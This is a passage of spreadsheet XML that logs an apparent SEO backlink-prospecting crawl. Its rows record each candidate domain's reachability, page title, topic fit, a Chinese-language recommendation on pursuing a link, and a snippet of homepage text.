        <x:v>Shop modular panels and giant play blocks online at EverBlock. Our modular systems are made of high quality materials and completely modular so you can have fun creating the space you need in the space you have. Purchase modular furniture and more at EverBlock today. Modular Building Blocks for Partioning &amp; More | EverBlock Systems Skip to main content Toll-Free: (844) 533-1184 Contact Us Free Custom Design 3D Block Builder Open Menu Shop Now EverBlock® Modular Building Blocks EverBlock® Block Wall &amp; Room Kits EverBlock® Bulk Packs &amp; Free-Play Sets EverBlock® Furniture &amp; Sculptural Kits EverBlock® Individual Blocks &amp; Accessories EverPanel® Modular Wall Panels EverPanel® Wall &amp; Room Kits Individual EverPanels® EverPanel® Accessories Interlocking Modular Flooring Walls &amp; Rooms Office Partitions All Simple Walls All Walls With Doors All Rooms Trade Show Booths Applications Room Dividers &amp; Modular Walls Office Walls &amp; Partitions Hospitality Family Entertainm</x:v>
      </x:c>
      <x:c r="R127" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S127" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T127" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://everblocksystems.com</x:v>
      </x:c>
    </x:row>
    <x:row r="128">
      <x:c r="A128" s="18" t="str">
        <x:v>127</x:v>
      </x:c>
      <x:c r="B128" s="19" t="str">
        <x:v>twinkl.com.tw</x:v>
      </x:c>
      <x:c r="C128" s="19" t="str">
        <x:v>https://twinkl.com.tw</x:v>
      </x:c>
      <x:c r="D128" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E128" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F128" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G128" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H128" s="19" t="str">
        <x:v>https://www.twinkl.com.tw/</x:v>
      </x:c>
      <x:c r="I128" s="19" t="str"/>
      <x:c r="J128" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K128" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L128" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M128" s="19" t="str">
        <x:v>https://www.twinkl.com.tw/</x:v>
      </x:c>
      <x:c r="N128" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O128" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P128" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q128" s="21" t="str"/>
      <x:c r="R128" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S128" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T128" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.tw</x:v>
      </x:c>
    </x:row>
    <x:row r="129">
      <x:c r="A129" s="18" t="str">
        <x:v>128</x:v>
      </x:c>
      <x:c r="B129" s="19" t="str">
        <x:v>twinkl.nl</x:v>
      </x:c>
      <x:c r="C129" s="19" t="str">
        <x:v>https://twinkl.nl</x:v>
      </x:c>
      <x:c r="D129" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E129" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F129" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G129" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H129" s="19" t="str">
        <x:v>https://www.twinkl.nl/</x:v>
      </x:c>
      <x:c r="I129" s="19" t="str"/>
      <x:c r="J129" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K129" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L129" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M129" s="19" t="str">
        <x:v>https://www.twinkl.nl/</x:v>
      </x:c>
      <x:c r="N129" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O129" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P129" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q129" s="21" t="str"/>
      <x:c r="R129" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S129" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T129" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.nl</x:v>
      </x:c>
    </x:row>
    <x:row r="130">
      <x:c r="A130" s="18" t="str">
        <x:v>129</x:v>
      </x:c>
      <x:c r="B130" s="19" t="str">
        <x:v>twinkl.fi</x:v>
      </x:c>
      <x:c r="C130" s="19" t="str">
        <x:v>https://twinkl.fi</x:v>
      </x:c>
      <x:c r="D130" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E130" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F130" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G130" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H130" s="19" t="str">
        <x:v>https://www.twinkl.fi/</x:v>
      </x:c>
      <x:c r="I130" s="19" t="str"/>
      <x:c r="J130" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K130" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L130" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M130" s="19" t="str">
        <x:v>https://www.twinkl.fi/</x:v>
      </x:c>
      <x:c r="N130" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O130" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P130" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q130" s="21" t="str"/>
      <x:c r="R130" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S130" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T130" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.fi</x:v>
      </x:c>
    </x:row>
    <x:row r="131">
      <x:c r="A131" s="18" t="str">
        <x:v>130</x:v>
      </x:c>
      <x:c r="B131" s="19" t="str">
        <x:v>linkedin.com</x:v>
      </x:c>
      <x:c r="C131" s="19" t="str">
        <x:v>https://linkedin.com</x:v>
      </x:c>
      <x:c r="D131" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E131" s="20" t="str">
        <x:v>4</x:v>
      </x:c>
      <x:c r="F131" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G131" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H131" s="19" t="str">
        <x:v>https://www.linkedin.com/</x:v>
      </x:c>
      <x:c r="I131" s="19" t="str">
        <x:v>LinkedIn: Log In or Sign Up</x:v>
      </x:c>
      <x:c r="J131" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K131" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L131" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M131" s="19" t="str">
        <x:v>https://www.linkedin.com/</x:v>
      </x:c>
      <x:c r="N131" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O131" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P131" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q131" s="21" t="str">
        <x:v>1 billion members | Manage your professional identity. Build and engage with your professional network. Access knowledge, insights and opportunities. LinkedIn: Log In or Sign Up Skip to main content Agree &amp; Join LinkedIn By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . LinkedIn Top Content People Learning Jobs Games Sign in Join now Welcome to your professional community Sign in with email By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement , Privacy Policy , and Cookie Policy . New to LinkedIn? Join now Explore top LinkedIn content Discover relevant posts and expert insights — curated by topic and in one place. Career Productivity Finance Soft Skills &amp; Emotional Intelligence Project Management Education Technology Leadership Ecommerce Show a</x:v>
      </x:c>
      <x:c r="R131" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S131" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T131" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://linkedin.com</x:v>
      </x:c>
    </x:row>
    <x:row r="132">
      <x:c r="A132" s="18" t="str">
        <x:v>131</x:v>
      </x:c>
      <x:c r="B132" s="19" t="str">
        <x:v>yedi24online.net</x:v>
      </x:c>
      <x:c r="C132" s="19" t="str">
        <x:v>https://yedi24online.net</x:v>
      </x:c>
      <x:c r="D132" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E132" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F132" s="20"/>
      <x:c r="G132" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H132" s="19" t="str"/>
      <x:c r="I132" s="19" t="str"/>
      <x:c r="J132" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K132" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L132" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M132" s="19" t="str">
        <x:v>https://yedi24online.net</x:v>
      </x:c>
      <x:c r="N132" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O132" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P132" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q132" s="21" t="str"/>
      <x:c r="R132" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S132" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T132" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://yedi24online.net
http://yedi24online.net</x:v>
      </x:c>
    </x:row>
    <x:row r="133">
      <x:c r="A133" s="18" t="str">
        <x:v>132</x:v>
      </x:c>
      <x:c r="B133" s="19" t="str">
        <x:v>thewordcolumbus.com</x:v>
      </x:c>
      <x:c r="C133" s="19" t="str">
        <x:v>https://thewordcolumbus.com</x:v>
      </x:c>
      <x:c r="D133" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E133" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F133" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G133" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H133" s="19" t="str">
        <x:v>https://thewordcolumbus.com/</x:v>
      </x:c>
      <x:c r="I133" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J133" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K133" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L133" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M133" s="19" t="str">
        <x:v>https://thewordcolumbus.com/</x:v>
      </x:c>
      <x:c r="N133" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O133" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P133" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q133" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access thewordcolumbus.com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a349b9338a529d95 &amp;bull; Your IP: C</x:v>
      </x:c>
      <x:c r="R133" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S133" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T133" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://thewordcolumbus.com</x:v>
      </x:c>
    </x:row>
    <x:row r="134">
      <x:c r="A134" s="18" t="str">
        <x:v>133</x:v>
      </x:c>
      <x:c r="B134" s="19" t="str">
        <x:v>kpdq.com</x:v>
      </x:c>
      <x:c r="C134" s="19" t="str">
        <x:v>https://kpdq.com</x:v>
      </x:c>
      <x:c r="D134" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E134" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F134" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G134" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H134" s="19" t="str">
        <x:v>https://kpdq.com/</x:v>
      </x:c>
      <x:c r="I134" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J134" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K134" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L134" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M134" s="19" t="str">
        <x:v>https://kpdq.com/</x:v>
      </x:c>
      <x:c r="N134" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O134" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P134" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q134" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access kpdq.com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a349b934adb57349 &amp;bull; Your IP: Click to rev</x:v>
      </x:c>
      <x:c r="R134" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S134" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T134" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://kpdq.com</x:v>
      </x:c>
    </x:row>
    <x:row r="135">
      <x:c r="A135" s="18" t="str">
        <x:v>134</x:v>
      </x:c>
      <x:c r="B135" s="19" t="str">
        <x:v>veritas.es</x:v>
      </x:c>
      <x:c r="C135" s="19" t="str">
        <x:v>https://veritas.es</x:v>
      </x:c>
      <x:c r="D135" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E135" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F135" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G135" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H135" s="19" t="str">
        <x:v>https://www.veritas.es/</x:v>
      </x:c>
      <x:c r="I135" s="19" t="str">
        <x:v>Veritas | Alimentación Ecológica y Supermercado Eco Líder</x:v>
      </x:c>
      <x:c r="J135" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K135" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L135" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M135" s="19" t="str">
        <x:v>https://www.veritas.es/</x:v>
      </x:c>
      <x:c r="N135" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O135" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P135" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q135" s="21" t="str">
        <x:v>Únete a la cadena líder en alimentación ecológica. En Veritas garantizamos productos con certificación bio para cuidar de tu salud y del planeta. Descúbrelos. Veritas | Alimentación Ecológica y Supermercado Eco Líder Te regalamos 50€ para tus próximas compras · Regístrate y aprovecha la oferta Te regalamos 50€ para tus próximas compras · Regístrate y aprovecha la oferta Menú Comprar Volver al menu principal Conócenos Quienes Somos Nuestra Marca Compañeros de Viaje Sostenibilidad Trabaja con nosotros Por que ECO El ABC Estudios Etiquetas Club Club Veritas Aprende Recetas y Menús Consejos De Temporada Revista Talleres Ecotalks Noticias Terra Veritas Food Service Veritas Veritas Contacto Tiendas Localiza tu Tienda Buscar Buscar Idioma ES Castellano Català Identifícate Cuenta Idioma ES Castellano Català Elige la Entrega Cambiar ubicación Identifícate </x:v>
      </x:c>
      <x:c r="R135" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S135" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T135" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://veritas.es</x:v>
      </x:c>
    </x:row>
    <x:row r="136">
      <x:c r="A136" s="18" t="str">
        <x:v>135</x:v>
      </x:c>
      <x:c r="B136" s="19" t="str">
        <x:v>gwhs1955.org</x:v>
      </x:c>
      <x:c r="C136" s="19" t="str">
        <x:v>https://gwhs1955.org</x:v>
      </x:c>
      <x:c r="D136" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E136" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F136" s="20"/>
      <x:c r="G136" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H136" s="19" t="str"/>
      <x:c r="I136" s="19" t="str"/>
      <x:c r="J136" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K136" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L136" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M136" s="19" t="str">
        <x:v>https://gwhs1955.org</x:v>
      </x:c>
      <x:c r="N136" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O136" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P136" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q136" s="21" t="str"/>
      <x:c r="R136" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S136" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T136" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://gwhs1955.org
http://gwhs1955.org</x:v>
      </x:c>
    </x:row>
    <x:row r="137">
      <x:c r="A137" s="18" t="str">
        <x:v>136</x:v>
      </x:c>
      <x:c r="B137" s="19" t="str">
        <x:v>la-traccia.com</x:v>
      </x:c>
      <x:c r="C137" s="19" t="str">
        <x:v>https://la-traccia.com</x:v>
      </x:c>
      <x:c r="D137" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E137" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F137" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G137" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H137" s="19" t="str">
        <x:v>https://www.la-traccia.com/</x:v>
      </x:c>
      <x:c r="I137" s="19" t="str">
        <x:v>La Traccia | Gentle Parenting Olistico tra Oriente e Occidente</x:v>
      </x:c>
      <x:c r="J137" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K137" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L137" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M137" s="19" t="str">
        <x:v>https://www.la-traccia.com/</x:v>
      </x:c>
      <x:c r="N137" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O137" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P137" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q137" s="21" t="str">
        <x:v>Scopri La Traccia, il punto di riferimento del Gentle Parenting Olistico. Educazione integrata e creativa a lungo termine tra Oriente ed Occidente. La Traccia | Gentle Parenting Olistico tra Oriente e Occidente La Traccia BE EDUCATIVE BE CREATIVE Menu Home Shop Rubriche Mamma Papà Baby Edu-Creative Channel La Traccia Amica Help the children Donne Coraggio About Blog Newsletter &amp;euro; 0.00 0 Carrello ACCEDI Benvenuti in La Traccia Scopri LA TRACCIA, il punto di riferimento italiano del GENTLE PARENTING OLISTICO : EDUCAZIONE INTEGRATA e CREATIVA a lungo termine tra Oriente ed Occidente. SCOPRI DI Più TUTTE LE OPPORTUNITà CHE TROVI IN LA TRACCIA Approccio Pedagogico Integrato i nostri Pilastri Olistici LA CASA DEI GENITORI – ispirata alla Casa dei Bambini di Maria Montessori EDUCAZIONE: materiali e progetti per bambini e genitori, ispirati</x:v>
      </x:c>
      <x:c r="R137" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S137" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T137" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://la-traccia.com
http://la-traccia.com</x:v>
      </x:c>
    </x:row>
    <x:row r="138">
      <x:c r="A138" s="18" t="str">
        <x:v>137</x:v>
      </x:c>
      <x:c r="B138" s="19" t="str">
        <x:v>creativesjoy.com</x:v>
      </x:c>
      <x:c r="C138" s="19" t="str">
        <x:v>https://creativesjoy.com</x:v>
      </x:c>
      <x:c r="D138" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E138" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F138" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G138" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H138" s="19" t="str">
        <x:v>https://creativesjoy.com/</x:v>
      </x:c>
      <x:c r="I138" s="19" t="str">
        <x:v>Creatives Joy</x:v>
      </x:c>
      <x:c r="J138" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K138" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L138" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M138" s="19" t="str">
        <x:v>https://creativesjoy.com/</x:v>
      </x:c>
      <x:c r="N138" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O138" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P138" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q138" s="21" t="str">
        <x:v>In our blog you will find the most interesting crafts and tutorials about DIY, art, home decor, stylizations, and much more best ideas from blogs and experts all over the world. Creatives Joy Skip to content Home Crochet Latest Post How to Crochet Headband Free Pattern Heart Cushion Free Crochet Pattern for Home How to Crochet Beautiful Mini Rose for Beginners Free Club Poker Granny Crochet Pattern Block for Blankets Free Crochet Frog Granny Square Pattern with Cute Details Free Crochet Club Poker Granny Pattern with Easy Steps Free Crochet Pattern for a Christmas Stocking How to Crochet Bandana – Free Step-by-Step Pattern Free Beanie Hat Crochet Pattern for Casual Style Easy Free Crochet Sweater Pattern Free Crochet Cozy Slippers Pattern for Everyday Comfort How to Beautiful Crochet Dahlia Flower for Spring How to Crochet Delicate Earring for Ladies How to Crochet </x:v>
      </x:c>
      <x:c r="R138" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S138" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T138" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://creativesjoy.com</x:v>
      </x:c>
    </x:row>
    <x:row r="139">
      <x:c r="A139" s="18" t="str">
        <x:v>138</x:v>
      </x:c>
      <x:c r="B139" s="19" t="str">
        <x:v>siterubix.com</x:v>
      </x:c>
      <x:c r="C139" s="19" t="str">
        <x:v>https://siterubix.com</x:v>
      </x:c>
      <x:c r="D139" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E139" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F139" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G139" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H139" s="19" t="str">
        <x:v>https://www.wealthyaffiliate.com/</x:v>
      </x:c>
      <x:c r="I139" s="19" t="str">
        <x:v>Now Is Your Time to Build an Online Business</x:v>
      </x:c>
      <x:c r="J139" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K139" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L139" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M139" s="19" t="str">
        <x:v>https://www.wealthyaffiliate.com/</x:v>
      </x:c>
      <x:c r="N139" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O139" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P139" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q139" s="21" t="str">
        <x:v>Launch your online business with Wealthy Affiliate. Get everything you need: AI-powered tools, step-by-step training, web hosting, and 24/7 support. Start free today! Now Is Your Time to Build an Online Business Wealthy Affiliate Start Free No credit card. Takes under a minute. Start Free Login The Internet Changed. Most Online Businesses Didn't. Whether you're starting from scratch or frustrated with a lack of results, we help you build a real, profitable online business with modern training and AI. Start Building Free → No Credit Card Instant Access 4,000 Free AI Credits 2.9M+ Members 190+ Countries Served 20+ Years Online 50K+ Success Stories The world's most successful affiliate marketing training platform. Join 2.9M+ entrepreneurs building their online business with expert training, tools, and support. Join Free Today Member Login © 2005- 2026 Wealth</x:v>
      </x:c>
      <x:c r="R139" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S139" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T139" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://siterubix.com</x:v>
      </x:c>
    </x:row>
    <x:row r="140">
      <x:c r="A140" s="18" t="str">
        <x:v>139</x:v>
      </x:c>
      <x:c r="B140" s="19" t="str">
        <x:v>smefundinghub.com</x:v>
      </x:c>
      <x:c r="C140" s="19" t="str">
        <x:v>https://smefundinghub.com</x:v>
      </x:c>
      <x:c r="D140" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E140" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F140" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G140" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H140" s="19" t="str">
        <x:v>https://smefundinghub.com/</x:v>
      </x:c>
      <x:c r="I140" s="19" t="str">
        <x:v>SME Funding Hub - Home</x:v>
      </x:c>
      <x:c r="J140" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K140" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L140" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M140" s="19" t="str">
        <x:v>https://smefundinghub.com/</x:v>
      </x:c>
      <x:c r="N140" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O140" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P140" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q140" s="21" t="str">
        <x:v>SME Funding Hub - Home Home Services SMSF Loans Acquisition &amp; goodwill loans Working capital &amp; trade loans Asset &amp; equipment finance Commercial property finance Industries Manufacturing industries Medical &amp; allied health Wine, farming and agriculture SMEs Blog About Contact 1300 002 026 Schedule an Appointment Commercial Loans &amp; Debt Advisory Debt advisors with a highly successful debt placement record Get Funds, Fast! Increase Business Profits With Better Debt Structures Free Up Stagnant Business Equity Strengthen Your Core Finance Advisory Team Apply Now " * " indicates required fields X/Twitter This field is for validation purposes and should be left unchanged. First name * Last name * Mo</x:v>
      </x:c>
      <x:c r="R140" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S140" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T140" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://smefundinghub.com</x:v>
      </x:c>
    </x:row>
    <x:row r="141">
      <x:c r="A141" s="18" t="str">
        <x:v>140</x:v>
      </x:c>
      <x:c r="B141" s="19" t="str">
        <x:v>swtafe.edu.au</x:v>
      </x:c>
      <x:c r="C141" s="19" t="str">
        <x:v>https://swtafe.edu.au</x:v>
      </x:c>
      <x:c r="D141" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E141" s="20" t="str">
        <x:v>0</x:v>
